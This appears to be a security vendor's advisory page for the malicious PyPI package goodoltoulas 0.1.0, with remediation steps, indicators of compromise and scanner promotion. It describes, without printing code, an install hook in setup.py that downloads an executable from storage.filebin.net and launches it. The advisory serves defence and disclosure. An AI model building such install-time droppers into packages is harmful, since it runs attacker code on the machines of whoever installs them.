Which versions of goodoltoulas are malicious?

The following PyPI versions of goodoltoulas are flagged malicious: 0.1.0. Treat any of these as compromised.

How do I remediate goodoltoulas if I installed it?

Remove goodoltoulas from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is goodoltoulas part of a known attack campaign?

Yes — goodoltoulas is associated with the 2026-06-goodoldtoulas, IN-MAL-2026-006185, IN-MAL-2026-006186 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect goodoltoulas in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking goodoltoulas and packages like it before any post-install script runs.

Malicious package

goodoltoulasPyPI

Malicious code in goodoltoulas (PyPI) Remove it immediately and rotate any exposed credentials.

MAL-2026-5272

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

pip uninstall goodoltoulas

What this malware does

On pip install goodoltoulas, setup.py unconditionally invokes setup_helper(), which downloads an opaque PE binary from an anonymous file-hosting service (storage.filebin.net) into C:\MALWARE_DELETE\main.exe and launches it via subprocess.Popen with CREATE_NEW_CONSOLE. There is no hash check, signature verification, or version pinning, and the host is unrelated to any package publisher. The library surface is a thin decoy: init.py forwards all attribute access to the requests module and the README advertises 'A simple request cloner for Python', providing cover for the install-time dropper. The drop path uses a self-incriminating directory name (C:\MALWARE_DELETE) and the response carries application/vnd.microsoft.portable-executable, confirming hostile intent. Any Windows installer running pip install will execute attacker-controlled code immediately.

During installation, package attempts to download and run an executable imitating malicious activity.

Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: 2026-06-goodoldtoulas

Reasons (based on the campaign):

The package overrides the install command in setup.py to execute malicious code during installation.
Downloads and executes a remote executable.

Malicious versions

1 flagged

0.1.0

Indicators of compromise (SHA-256)

d1279e2d267bf2af95bf5c3a98cc71ac362ed2af7aa35f6bbfe1f05bb839cb18

98a84d10e07878c98ffa21b3920940b10ffac4d3cdd66250c046391ea502aaff

ee2ef27464f7f6b4aa1b5615a42ebd130e31cf169a4f3396656108d63a326b1b

Frequently asked questions

No. goodoltoulas on PyPI has been identified as a malicious package (version 0.1.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

2026-06-goodoldtoulasIN-MAL-2026-006185IN-MAL-2026-006186

References

Credits

Amazon Inspector · finder
Kamil Mańkowski (kam193) · reporter

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection